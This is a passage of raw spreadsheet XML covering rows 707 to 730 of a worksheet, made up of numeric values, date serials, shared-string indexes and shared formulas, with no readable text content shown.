        <v>10</v>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="1">
        <v>9904.0</v>
      </c>
      <c r="B707" s="2" t="s">
        <v>3190</v>
      </c>
      <c r="C707" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D707" s="2" t="s">
        <v>3177</v>
      </c>
      <c r="E707" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F707" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G707" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H707" s="4">
        <v>44419.80972222222</v>
      </c>
      <c r="I707" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J707" s="1" t="s">
        <v>3180</v>
      </c>
      <c r="K707" s="2" t="s">
        <v>3181</v>
      </c>
      <c r="L707" s="1">
        <v>7.0</v>
      </c>
      <c r="M707" s="1">
        <v>15.0</v>
      </c>
      <c r="N707" s="1" t="s">
        <v>3191</v>
      </c>
      <c r="O707" s="1" t="s">
        <v>3182</v>
      </c>
      <c r="P707" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q707" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R707" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S707" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="1">
        <v>9906.0</v>
      </c>
      <c r="B708" s="2" t="s">
        <v>3192</v>
      </c>
      <c r="C708" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D708" s="2" t="s">
        <v>3177</v>
      </c>
      <c r="E708" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F708" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G708" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H708" s="5">
        <v>44481.12708333333</v>
      </c>
      <c r="I708" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J708" s="1" t="s">
        <v>3180</v>
      </c>
      <c r="K708" s="2" t="s">
        <v>3181</v>
      </c>
      <c r="L708" s="1">
        <v>7.0</v>
      </c>
      <c r="M708" s="1">
        <v>15.0</v>
      </c>
      <c r="N708" s="1" t="s">
        <v>78</v>
      </c>
      <c r="O708" s="1" t="s">
        <v>3182</v>
      </c>
      <c r="P708" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q708" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R708" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S708" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="1">
        <v>9908.0</v>
      </c>
      <c r="B709" s="2" t="s">
        <v>3193</v>
      </c>
      <c r="C709" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D709" s="2" t="s">
        <v>3177</v>
      </c>
      <c r="E709" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F709" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G709" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H709" s="5">
        <v>44542.17152777778</v>
      </c>
      <c r="I709" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J709" s="1" t="s">
        <v>3180</v>
      </c>
      <c r="K709" s="2" t="s">
        <v>3181</v>
      </c>
      <c r="L709" s="1">
        <v>7.0</v>
      </c>
      <c r="M709" s="1">
        <v>15.0</v>
      </c>
      <c r="N709" s="1" t="s">
        <v>3194</v>
      </c>
      <c r="O709" s="1" t="s">
        <v>3182</v>
      </c>
      <c r="P709" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q709" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R709" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S709" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="1">
        <v>9910.0</v>
      </c>
      <c r="B710" s="2" t="s">
        <v>3195</v>
      </c>
      <c r="C710" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D710" s="2" t="s">
        <v>3177</v>
      </c>
      <c r="E710" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F710" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G710" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H710" s="4">
        <v>44839.72708333333</v>
      </c>
      <c r="I710" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J710" s="1" t="s">
        <v>3180</v>
      </c>
      <c r="K710" s="2" t="s">
        <v>3181</v>
      </c>
      <c r="L710" s="1">
        <v>7.0</v>
      </c>
      <c r="M710" s="1">
        <v>15.0</v>
      </c>
      <c r="N710" s="1" t="s">
        <v>3196</v>
      </c>
      <c r="O710" s="1" t="s">
        <v>3182</v>
      </c>
      <c r="P710" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q710" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R710" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S710" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="1">
        <v>9912.0</v>
      </c>
      <c r="B711" s="2" t="s">
        <v>3197</v>
      </c>
      <c r="C711" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D711" s="2" t="s">
        <v>3177</v>
      </c>
      <c r="E711" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F711" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G711" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H711" s="4">
        <v>44870.72152777778</v>
      </c>
      <c r="I711" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J711" s="1" t="s">
        <v>3180</v>
      </c>
      <c r="K711" s="2" t="s">
        <v>3181</v>
      </c>
      <c r="L711" s="1">
        <v>7.0</v>
      </c>
      <c r="M711" s="1">
        <v>15.0</v>
      </c>
      <c r="N711" s="1" t="s">
        <v>3198</v>
      </c>
      <c r="O711" s="1" t="s">
        <v>3182</v>
      </c>
      <c r="P711" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q711" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R711" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S711" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="1">
        <v>9915.0</v>
      </c>
      <c r="B712" s="2" t="s">
        <v>3199</v>
      </c>
      <c r="C712" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D712" s="2" t="s">
        <v>3200</v>
      </c>
      <c r="E712" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F712" s="1" t="s">
        <v>3201</v>
      </c>
      <c r="G712" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H712" s="1" t="s">
        <v>3202</v>
      </c>
      <c r="I712" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J712" s="1" t="s">
        <v>3203</v>
      </c>
      <c r="K712" s="2" t="s">
        <v>3204</v>
      </c>
      <c r="L712" s="1">
        <v>4.0</v>
      </c>
      <c r="M712" s="1">
        <v>8.0</v>
      </c>
      <c r="N712" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O712" s="1" t="s">
        <v>3205</v>
      </c>
      <c r="P712" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q712" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R712" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S712" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="1">
        <v>9917.0</v>
      </c>
      <c r="B713" s="2" t="s">
        <v>3206</v>
      </c>
      <c r="C713" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D713" s="2" t="s">
        <v>3200</v>
      </c>
      <c r="E713" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F713" s="1" t="s">
        <v>73</v>
      </c>
      <c r="G713" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H713" s="4">
        <v>43872.4</v>
      </c>
      <c r="I713" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J713" s="1" t="s">
        <v>3203</v>
      </c>
      <c r="K713" s="2" t="s">
        <v>3204</v>
      </c>
      <c r="L713" s="1">
        <v>4.0</v>
      </c>
      <c r="M713" s="1">
        <v>8.0</v>
      </c>
      <c r="N713" s="1" t="s">
        <v>3207</v>
      </c>
      <c r="O713" s="1" t="s">
        <v>3205</v>
      </c>
      <c r="P713" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q713" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R713" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S713" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="1">
        <v>9918.0</v>
      </c>
      <c r="B714" s="2" t="s">
        <v>3208</v>
      </c>
      <c r="C714" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D714" s="2" t="s">
        <v>3200</v>
      </c>
      <c r="E714" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F714" s="1" t="s">
        <v>2656</v>
      </c>
      <c r="G714" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H714" s="1" t="s">
        <v>3209</v>
      </c>
      <c r="I714" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J714" s="1" t="s">
        <v>3203</v>
      </c>
      <c r="K714" s="2" t="s">
        <v>3204</v>
      </c>
      <c r="L714" s="1">
        <v>4.0</v>
      </c>
      <c r="M714" s="1">
        <v>8.0</v>
      </c>
      <c r="N714" s="1" t="s">
        <v>3210</v>
      </c>
      <c r="O714" s="1" t="s">
        <v>3205</v>
      </c>
      <c r="P714" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q714" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R714" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S714" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="1">
        <v>9919.0</v>
      </c>
      <c r="B715" s="2" t="s">
        <v>3211</v>
      </c>
      <c r="C715" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D715" s="2" t="s">
        <v>3200</v>
      </c>
      <c r="E715" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F715" s="1" t="s">
        <v>73</v>
      </c>
      <c r="G715" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H715" s="1" t="s">
        <v>3212</v>
      </c>
      <c r="I715" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J715" s="1" t="s">
        <v>3203</v>
      </c>
      <c r="K715" s="2" t="s">
        <v>3204</v>
      </c>
      <c r="L715" s="1">
        <v>4.0</v>
      </c>
      <c r="M715" s="1">
        <v>8.0</v>
      </c>
      <c r="N715" s="1" t="s">
        <v>1776</v>
      </c>
      <c r="O715" s="1" t="s">
        <v>3205</v>
      </c>
      <c r="P715" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q715" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R715" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S715" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="1">
        <v>9921.0</v>
      </c>
      <c r="B716" s="2" t="s">
        <v>3213</v>
      </c>
      <c r="C716" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D716" s="2" t="s">
        <v>3200</v>
      </c>
      <c r="E716" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F716" s="1" t="s">
        <v>73</v>
      </c>
      <c r="G716" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H716" s="1" t="s">
        <v>3214</v>
      </c>
      <c r="I716" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J716" s="1" t="s">
        <v>3203</v>
      </c>
      <c r="K716" s="2" t="s">
        <v>3204</v>
      </c>
      <c r="L716" s="1">
        <v>4.0</v>
      </c>
      <c r="M716" s="1">
        <v>8.0</v>
      </c>
      <c r="N716" s="1" t="s">
        <v>1876</v>
      </c>
      <c r="O716" s="1" t="s">
        <v>3205</v>
      </c>
      <c r="P716" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q716" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R716" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S716" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="1">
        <v>9923.0</v>
      </c>
      <c r="B717" s="2" t="s">
        <v>3215</v>
      </c>
      <c r="C717" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D717" s="2" t="s">
        <v>3216</v>
      </c>
      <c r="E717" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F717" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G717" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H717" s="1" t="s">
        <v>3217</v>
      </c>
      <c r="I717" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J717" s="1" t="s">
        <v>3218</v>
      </c>
      <c r="K717" s="2" t="s">
        <v>3219</v>
      </c>
      <c r="L717" s="1">
        <v>1.0</v>
      </c>
      <c r="M717" s="1">
        <v>1.0</v>
      </c>
      <c r="N717" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O717" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P717" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q717" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R717" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S717" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="1">
        <v>9924.0</v>
      </c>
      <c r="B718" s="2" t="s">
        <v>3220</v>
      </c>
      <c r="C718" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D718" s="6" t="s">
        <v>3200</v>
      </c>
      <c r="E718" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F718" s="1" t="s">
        <v>3221</v>
      </c>
      <c r="G718" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H718" s="1" t="s">
        <v>3222</v>
      </c>
      <c r="I718" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J718" s="1" t="s">
        <v>3223</v>
      </c>
      <c r="K718" s="2" t="s">
        <v>3224</v>
      </c>
      <c r="L718" s="1">
        <v>1.0</v>
      </c>
      <c r="M718" s="1">
        <v>1.0</v>
      </c>
      <c r="N718" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O718" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P718" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q718" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R718" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S718" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="1">
        <v>9926.0</v>
      </c>
      <c r="B719" s="2" t="s">
        <v>3225</v>
      </c>
      <c r="C719" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D719" s="2" t="s">
        <v>3226</v>
      </c>
      <c r="E719" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F719" s="1" t="s">
        <v>685</v>
      </c>
      <c r="G719" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H719" s="1" t="s">
        <v>3227</v>
      </c>
      <c r="I719" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J719" s="1" t="s">
        <v>3228</v>
      </c>
      <c r="K719" s="2" t="s">
        <v>3229</v>
      </c>
      <c r="L719" s="1">
        <v>3.0</v>
      </c>
      <c r="M719" s="1">
        <v>4.0</v>
      </c>
      <c r="N719" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O719" s="1" t="s">
        <v>3230</v>
      </c>
      <c r="P719" s="1" t="s">
        <v>970</v>
      </c>
      <c r="Q719" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R719" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S719" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="1">
        <v>9927.0</v>
      </c>
      <c r="B720" s="2" t="s">
        <v>3231</v>
      </c>
      <c r="C720" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D720" s="2" t="s">
        <v>3226</v>
      </c>
      <c r="E720" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F720" s="1" t="s">
        <v>43</v>
      </c>
      <c r="G720" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H720" s="1" t="s">
        <v>3232</v>
      </c>
      <c r="I720" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J720" s="1" t="s">
        <v>3228</v>
      </c>
      <c r="K720" s="2" t="s">
        <v>3229</v>
      </c>
      <c r="L720" s="1">
        <v>3.0</v>
      </c>
      <c r="M720" s="1">
        <v>4.0</v>
      </c>
      <c r="N720" s="1" t="s">
        <v>3233</v>
      </c>
      <c r="O720" s="1" t="s">
        <v>3230</v>
      </c>
      <c r="P720" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q720" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R720" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S720" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="1">
        <v>9929.0</v>
      </c>
      <c r="B721" s="2" t="s">
        <v>3234</v>
      </c>
      <c r="C721" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D721" s="2" t="s">
        <v>3226</v>
      </c>
      <c r="E721" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F721" s="1" t="s">
        <v>43</v>
      </c>
      <c r="G721" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H721" s="1" t="s">
        <v>3235</v>
      </c>
      <c r="I721" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J721" s="1" t="s">
        <v>3228</v>
      </c>
      <c r="K721" s="2" t="s">
        <v>3229</v>
      </c>
      <c r="L721" s="1">
        <v>3.0</v>
      </c>
      <c r="M721" s="1">
        <v>4.0</v>
      </c>
      <c r="N721" s="1" t="s">
        <v>3236</v>
      </c>
      <c r="O721" s="1" t="s">
        <v>3230</v>
      </c>
      <c r="P721" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q721" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R721" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S721" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="1">
        <v>9930.0</v>
      </c>
      <c r="B722" s="2" t="s">
        <v>3237</v>
      </c>
      <c r="C722" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D722" s="2" t="s">
        <v>3238</v>
      </c>
      <c r="E722" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F722" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G722" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H722" s="4">
        <v>44381.82430555556</v>
      </c>
      <c r="I722" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J722" s="1" t="s">
        <v>3239</v>
      </c>
      <c r="K722" s="2" t="s">
        <v>3240</v>
      </c>
      <c r="L722" s="1">
        <v>1.0</v>
      </c>
      <c r="M722" s="1">
        <v>1.0</v>
      </c>
      <c r="N722" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O722" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P722" s="1" t="s">
        <v>573</v>
      </c>
      <c r="Q722" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R722" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="S722" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="1">
        <v>9932.0</v>
      </c>
      <c r="B723" s="2" t="s">
        <v>3241</v>
      </c>
      <c r="C723" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D723" s="2" t="s">
        <v>3242</v>
      </c>
      <c r="E723" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F723" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G723" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H723" s="1" t="s">
        <v>3243</v>
      </c>
      <c r="I723" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J723" s="1" t="s">
        <v>3244</v>
      </c>
      <c r="K723" s="2" t="s">
        <v>3245</v>
      </c>
      <c r="L723" s="1">
        <v>3.0</v>
      </c>
      <c r="M723" s="1">
        <v>7.0</v>
      </c>
      <c r="N723" s="1" t="s">
        <v>2809</v>
      </c>
      <c r="O723" s="1" t="s">
        <v>3246</v>
      </c>
      <c r="P723" s="1" t="s">
        <v>3247</v>
      </c>
      <c r="Q723" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R723" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S723" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="1">
        <v>9940.0</v>
      </c>
      <c r="B724" s="2" t="s">
        <v>3248</v>
      </c>
      <c r="C724" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D724" s="2" t="s">
        <v>3249</v>
      </c>
      <c r="E724" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F724" s="1" t="s">
        <v>3250</v>
      </c>
      <c r="G724" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H724" s="1" t="s">
        <v>3251</v>
      </c>
      <c r="I724" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J724" s="1" t="s">
        <v>3252</v>
      </c>
      <c r="K724" s="2" t="s">
        <v>3253</v>
      </c>
      <c r="L724" s="1">
        <v>3.0</v>
      </c>
      <c r="M724" s="1">
        <v>3.0</v>
      </c>
      <c r="N724" s="1" t="s">
        <v>3254</v>
      </c>
      <c r="O724" s="1" t="s">
        <v>3255</v>
      </c>
      <c r="P724" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q724" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R724" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S724" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="1">
        <v>9941.0</v>
      </c>
      <c r="B725" s="2" t="s">
        <v>3256</v>
      </c>
      <c r="C725" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D725" s="2" t="s">
        <v>3257</v>
      </c>
      <c r="E725" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F725" s="1" t="s">
        <v>3258</v>
      </c>
      <c r="G725" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H725" s="1" t="s">
        <v>3259</v>
      </c>
      <c r="I725" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J725" s="1" t="s">
        <v>3260</v>
      </c>
      <c r="K725" s="2" t="s">
        <v>3261</v>
      </c>
      <c r="L725" s="1">
        <v>17.0</v>
      </c>
      <c r="M725" s="1">
        <v>21.0</v>
      </c>
      <c r="N725" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O725" s="1" t="s">
        <v>3262</v>
      </c>
      <c r="P725" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q725" s="1">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="R725" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S725" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="1">
        <v>9942.0</v>
      </c>
      <c r="B726" s="2" t="s">
        <v>3263</v>
      </c>
      <c r="C726" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D726" s="2" t="s">
        <v>3257</v>
      </c>
      <c r="E726" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F726" s="1" t="s">
        <v>3264</v>
      </c>
      <c r="G726" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H726" s="1" t="s">
        <v>3265</v>
      </c>
      <c r="I726" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J726" s="1" t="s">
        <v>3260</v>
      </c>
      <c r="K726" s="2" t="s">
        <v>3261</v>
      </c>
      <c r="L726" s="1">
        <v>17.0</v>
      </c>
      <c r="M726" s="1">
        <v>21.0</v>
      </c>
      <c r="N726" s="1" t="s">
        <v>3233</v>
      </c>
      <c r="O726" s="1" t="s">
        <v>3262</v>
      </c>
      <c r="P726" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q726" s="1">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="R726" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S726" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="1">
        <v>9943.0</v>
      </c>
      <c r="B727" s="2" t="s">
        <v>3266</v>
      </c>
      <c r="C727" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D727" s="2" t="s">
        <v>3257</v>
      </c>
      <c r="E727" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F727" s="1" t="s">
        <v>3267</v>
      </c>
      <c r="G727" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H727" s="1" t="s">
        <v>3268</v>
      </c>
      <c r="I727" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J727" s="1" t="s">
        <v>3260</v>
      </c>
      <c r="K727" s="2" t="s">
        <v>3261</v>
      </c>
      <c r="L727" s="1">
        <v>17.0</v>
      </c>
      <c r="M727" s="1">
        <v>21.0</v>
      </c>
      <c r="N727" s="1" t="s">
        <v>78</v>
      </c>
      <c r="O727" s="1" t="s">
        <v>3262</v>
      </c>
      <c r="P727" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q727" s="1">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="R727" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S727" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="1">
        <v>9948.0</v>
      </c>
      <c r="B728" s="2" t="s">
        <v>3269</v>
      </c>
      <c r="C728" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D728" s="2" t="s">
        <v>3257</v>
      </c>
      <c r="E728" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F728" s="1" t="s">
        <v>3270</v>
      </c>
      <c r="G728" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H728" s="1" t="s">
        <v>3271</v>
      </c>
      <c r="I728" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J728" s="1" t="s">
        <v>3260</v>
      </c>
      <c r="K728" s="2" t="s">
        <v>3261</v>
      </c>
      <c r="L728" s="1">
        <v>17.0</v>
      </c>
      <c r="M728" s="1">
        <v>21.0</v>
      </c>
      <c r="N728" s="1" t="s">
        <v>317</v>
      </c>
      <c r="O728" s="1" t="s">
        <v>3262</v>
      </c>
      <c r="P728" s="1" t="s">
        <v>1865</v>
      </c>
      <c r="Q728" s="1">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="R728" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S728" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="1">
        <v>9950.0</v>
      </c>
      <c r="B729" s="2" t="s">
        <v>3272</v>
      </c>
      <c r="C729" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D729" s="2" t="s">
        <v>3257</v>
      </c>
      <c r="E729" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F729" s="1" t="s">
        <v>3264</v>
      </c>
      <c r="G729" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H729" s="1" t="s">
        <v>3273</v>
      </c>
      <c r="I729" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J729" s="1" t="s">
        <v>3260</v>
      </c>
      <c r="K729" s="2" t="s">
        <v>3261</v>
      </c>
      <c r="L729" s="1">
        <v>17.0</v>
      </c>
      <c r="M729" s="1">
        <v>21.0</v>
      </c>
      <c r="N729" s="1" t="s">
        <v>700</v>
      </c>
      <c r="O729" s="1" t="s">
        <v>3262</v>
      </c>
      <c r="P729" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q729" s="1">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="R729" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S729" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="1">
        <v>9955.0</v>
      </c>
      <c r="B730" s="2" t="s">
        <v>3274</v>
      </c>
      <c r="C730" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D730" s="2" t="s">
        <v>3257</v>
      </c>
      <c r="E730" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F730" s="1" t="s">
        <v>3275</v>
      </c>
      <c r="G730" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H730" s="1" t="s">
        <v>3276</v>
      </c>
      <c r="I730" s="1" t="s">
        <v>25</v>
      </c>
